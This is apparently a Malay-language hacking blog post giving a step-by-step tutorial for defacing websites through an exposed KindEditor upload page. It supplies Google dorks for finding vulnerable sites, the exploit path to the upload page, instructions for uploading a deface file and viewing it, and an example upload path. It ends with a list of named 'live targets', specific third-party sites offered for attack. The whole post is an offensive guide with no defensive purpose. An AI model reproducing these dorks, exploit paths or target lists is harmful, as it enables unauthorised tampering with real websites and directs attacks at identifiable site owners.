Assalamualaikum semua...entry hari ini aku nak ajar korang cara deface dengan KindEditor...tanpa berlengah lagi jom mula...
1. Mula-mula cari website vuln guna dork dibawah :
- intitle:index of? inurl:kindeditor
- inurl:examples/uploadbutton.html
#note :korang bole guna dork sniri untuk mendapatkan web yg vuln.use your brain.. ;)
selepas itu pilih salah satu website.
2. Setelah buka website tersebut, masukkan exploit dibawah :
http://www.sitevuln.com/kindeditor/examples/uploadbutton.html
Atau bukak directory one by one(lebih berkesan)
click, pilih file deface anda, dan dia akan upload automatik.
Supported Files:doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2, gif, jpg, dll
4. Untuk tngok hasil deface, akan terpapar link file yg telah di-upload sebentar tadi di dalam kotak sebelah upload itu.Cuma perlu copy, dan replace link itu di depan url website.
CONTOH :
Dalam Kotak keluar :
/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
Replace Link ni di depan URL :
http://www.arimlab.com/themes/default/js/kindeditor/attached/file/20111222/20111222172332_24051.html
5. DONE!!!
Some Live Targets :
- http://www.arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
- http://www.clogoo.net/public/js/kindeditor/examples/uploadbutton.html
Baiklah itu saja untuk entry kali ini...semoga terhibur dan berjaya..ngee~~~INGAT!Jangan malas untuk meng-explore dan mereka dork sniri...selamat berjaya...
Assalamualaikum
Assalamualaikum
